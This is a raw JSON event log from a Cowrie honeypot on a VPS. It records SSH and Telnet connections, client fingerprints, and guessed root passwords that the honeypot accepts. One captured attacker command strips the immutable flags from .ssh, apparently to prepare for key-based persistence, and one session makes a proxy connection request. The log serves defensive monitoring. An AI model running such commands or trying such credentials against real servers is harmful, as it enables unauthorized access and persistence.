{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:10:24.963556Z","src_ip":"212.227.235.229","session":"bb723164a3e8"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd01","message":"login attempt [root/P@55w0rd01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:10:28.997503Z","src_ip":"212.227.235.229","session":"bb723164a3e8"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:10:30.627868Z","src_ip":"212.227.235.229","session":"bb723164a3e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:12:44.981658Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.session.closed","duration":180.13646292686462,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:12:44.986735Z","src_ip":"176.65.149.186","session":"9dca95dd8ac4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61850,"dst_ip":"1.2.3.4","dst_port":22,"session":"078e409e317f","protocol":"ssh","message":"New connection: 217.72.205.35:61850 (1.2.3.4:22) [session: 078e409e317f]","sensor":"my-vps","timestamp":"2025-08-26T08:13:46.770157Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:13:46.771451Z","src_ip":"217.72.205.35","session":"078e409e317f"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":41618,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6fb690c1d1a","protocol":"ssh","message":"New connection: 139.19.117.131:41618 (1.2.3.4:22) [session: c6fb690c1d1a]","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.007440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.008790Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.026936Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyDdDzGKUTaIMbB3l+M2LgYScsUS3dPNUnOLpkkmulxnFBQSlogj0CgPpZy7fHLz5gXvCxIXSA6h+EXcJPrXyOIo15oipDO5tbCB4fUdCK6I9Sv8H8kPEzoQ13fmaG9Y8DiZltqwdHcmqjBwJtJ6+Gk7EL4IzgN2x1Zk2yIGNfJgPqMacy80rrsc7vbCIS011SZ2H6befkxc3ueJHVQS+tZu+Uo1W5vY404HJcfHWzSsUz2wYhgSp1hQJxBydDZPWtQEXoGprLpr3pSFkI3DFrJrRCGnIQBgHpOzT3ExzeqbhqiPrRqgYW8wvDSo8rzyZLFT2SLX4QbRJ6OhFh8CZV","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.072457Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyDdDzGKUTaIMbB3l+M2LgYScsUS3dPNUnOLpkkmulxnFBQSlogj0CgPpZy7fHLz5gXvCxIXSA6h+EXcJPrXyOIo15oipDO5tbCB4fUdCK6I9Sv8H8kPEzoQ13fmaG9Y8DiZltqwdHcmqjBwJtJ6+Gk7EL4IzgN2x1Zk2yIGNfJgPqMacy80rrsc7vbCIS011SZ2H6befkxc3ueJHVQS+tZu+Uo1W5vY404HJcfHWzSsUz2wYhgSp1hQJxBydDZPWtQEXoGprLpr3pSFkI3DFrJrRCGnIQBgHpOzT3ExzeqbhqiPrRqgYW8wvDSo8rzyZLFT2SLX4QbRJ6OhFh8CZV","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.074582Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyDdDzGKUTaIMbB3l+M2LgYScsUS3dPNUnOLpkkmulxnFBQSlogj0CgPpZy7fHLz5gXvCxIXSA6h+EXcJPrXyOIo15oipDO5tbCB4fUdCK6I9Sv8H8kPEzoQ13fmaG9Y8DiZltqwdHcmqjBwJtJ6+Gk7EL4IzgN2x1Zk2yIGNfJgPqMacy80rrsc7vbCIS011SZ2H6befkxc3ueJHVQS+tZu+Uo1W5vY404HJcfHWzSsUz2wYhgSp1hQJxBydDZPWtQEXoGprLpr3pSFkI3DFrJrRCGnIQBgHpOzT3ExzeqbhqiPrRqgYW8wvDSo8rzyZLFT2SLX4QbRJ6OhFh8CZV","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.094162Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b7:89:bc:ac:0d:45:2f:84:ed:84:45:2d:12:60:ce:75","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyDdDzGKUTaIMbB3l+M2LgYScsUS3dPNUnOLpkkmulxnFBQSlogj0CgPpZy7fHLz5gXvCxIXSA6h+EXcJPrXyOIo15oipDO5tbCB4fUdCK6I9Sv8H8kPEzoQ13fmaG9Y8DiZltqwdHcmqjBwJtJ6+Gk7EL4IzgN2x1Zk2yIGNfJgPqMacy80rrsc7vbCIS011SZ2H6befkxc3ueJHVQS+tZu+Uo1W5vY404HJcfHWzSsUz2wYhgSp1hQJxBydDZPWtQEXoGprLpr3pSFkI3DFrJrRCGnIQBgHpOzT3ExzeqbhqiPrRqgYW8wvDSo8rzyZLFT2SLX4QbRJ6OhFh8CZV","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:14:43.095174Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":47706,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccb04e592e0b","protocol":"telnet","message":"New connection: 176.65.149.186:47706 (1.2.3.4:23) [session: ccb04e592e0b]","sensor":"my-vps","timestamp":"2025-08-26T08:14:44.106707Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:14:44.146868Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:14:44.171443Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T08:14:44.173429Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T08:14:44.174820Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37084,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a1dbff302d2","protocol":"telnet","message":"New connection: 212.227.125.160:37084 (1.2.3.4:23) [session: 0a1dbff302d2]","sensor":"my-vps","timestamp":"2025-08-26T08:14:45.401758Z"}
{"eventid":"cowrie.session.closed","duration":0.1772754192352295,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:14:45.578960Z","src_ip":"212.227.125.160","session":"0a1dbff302d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37094,"dst_ip":"1.2.3.4","dst_port":23,"session":"71fd3f0fb8a4","protocol":"telnet","message":"New connection: 212.227.125.160:37094 (1.2.3.4:23) [session: 71fd3f0fb8a4]","sensor":"my-vps","timestamp":"2025-08-26T08:14:45.755046Z"}
{"eventid":"cowrie.session.closed","duration":0.001241445541381836,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:14:45.756204Z","src_ip":"212.227.125.160","session":"71fd3f0fb8a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37110,"dst_ip":"1.2.3.4","dst_port":23,"session":"26a529a09497","protocol":"telnet","message":"New connection: 212.227.125.160:37110 (1.2.3.4:23) [session: 26a529a09497]","sensor":"my-vps","timestamp":"2025-08-26T08:14:46.111879Z"}
{"eventid":"cowrie.session.closed","duration":0.17762041091918945,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:14:46.289434Z","src_ip":"212.227.125.160","session":"26a529a09497"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37116,"dst_ip":"1.2.3.4","dst_port":23,"session":"31b7c01e6809","protocol":"telnet","message":"New connection: 212.227.125.160:37116 (1.2.3.4:23) [session: 31b7c01e6809]","sensor":"my-vps","timestamp":"2025-08-26T08:14:46.465897Z"}
{"eventid":"cowrie.session.closed","duration":0.001271963119506836,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:14:46.467076Z","src_ip":"212.227.125.160","session":"31b7c01e6809"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:14:53.007540Z","src_ip":"139.19.117.131","session":"c6fb690c1d1a"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.46","src_port":65182,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdaf11532a45","protocol":"telnet","message":"New connection: 205.210.31.46:65182 (1.2.3.4:23) [session: cdaf11532a45]","sensor":"my-vps","timestamp":"2025-08-26T08:15:02.767779Z"}
{"eventid":"cowrie.session.closed","duration":9.884305238723755,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:15:12.652013Z","src_ip":"205.210.31.46","session":"cdaf11532a45"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":36854,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d08041c944a","protocol":"ssh","message":"New connection: 45.88.8.215:36854 (1.2.3.4:22) [session: 5d08041c944a]","sensor":"my-vps","timestamp":"2025-08-26T08:15:42.981319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:15:43.318472Z","src_ip":"45.88.8.215","session":"5d08041c944a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:15:43.319602Z","src_ip":"45.88.8.215","session":"5d08041c944a"}
{"eventid":"cowrie.login.success","username":"root","password":"Lekhan@123","message":"login attempt [root/Lekhan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:15:45.188033Z","src_ip":"45.88.8.215","session":"5d08041c944a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:15:45.656794Z","src_ip":"45.88.8.215","session":"5d08041c944a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42342,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0ecebed9a9","protocol":"ssh","message":"New connection: 212.227.235.229:42342 (1.2.3.4:22) [session: 4c0ecebed9a9]","sensor":"my-vps","timestamp":"2025-08-26T08:16:15.366997Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:16:15.368167Z","src_ip":"212.227.235.229","session":"4c0ecebed9a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42743,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d3d10c9d4ea","protocol":"ssh","message":"New connection: 212.227.235.229:42743 (1.2.3.4:22) [session: 1d3d10c9d4ea]","sensor":"my-vps","timestamp":"2025-08-26T08:16:15.476062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:16:15.477336Z","src_ip":"212.227.235.229","session":"1d3d10c9d4ea"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T08:16:15.612036Z","src_ip":"212.227.235.229","session":"1d3d10c9d4ea"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:16:16.021112Z","src_ip":"212.227.235.229","session":"1d3d10c9d4ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T08:16:16.156805Z","session":"1d3d10c9d4ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38864,"dst_ip":"1.2.3.4","dst_port":23,"session":"e51de7f1e737","protocol":"telnet","message":"New connection: 212.227.125.160:38864 (1.2.3.4:23) [session: e51de7f1e737]","sensor":"my-vps","timestamp":"2025-08-26T08:17:22.595891Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:17:25.477142Z","src_ip":"212.227.235.229","session":"1d3d10c9d4ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54361,"dst_ip":"1.2.3.4","dst_port":23,"session":"7248563f26b7","protocol":"telnet","message":"New connection: 212.227.235.229:54361 (1.2.3.4:23) [session: 7248563f26b7]","sensor":"my-vps","timestamp":"2025-08-26T08:17:35.227777Z"}
{"eventid":"cowrie.session.closed","duration":12.776238203048706,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:17:35.372024Z","src_ip":"212.227.125.160","session":"e51de7f1e737"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:17:44.174196Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.session.closed","duration":180.07266473770142,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:17:44.179265Z","src_ip":"176.65.149.186","session":"ccb04e592e0b"}
{"eventid":"cowrie.session.closed","duration":12.504760503768921,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:17:47.731566Z","src_ip":"212.227.235.229","session":"7248563f26b7"}
{"eventid":"cowrie.session.connect","src_ip":"23.95.128.167","src_port":37474,"dst_ip":"1.2.3.4","dst_port":22,"session":"130d0d0d7c2c","protocol":"ssh","message":"New connection: 23.95.128.167:37474 (1.2.3.4:22) [session: 130d0d0d7c2c]","sensor":"my-vps","timestamp":"2025-08-26T08:18:22.037082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:22.038387Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:22.620998Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Root1234.","message":"login attempt [root/Root1234.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:18:22.974849Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:18:23.230468Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.231380Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.232466Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.355326Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:18:23.681274Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
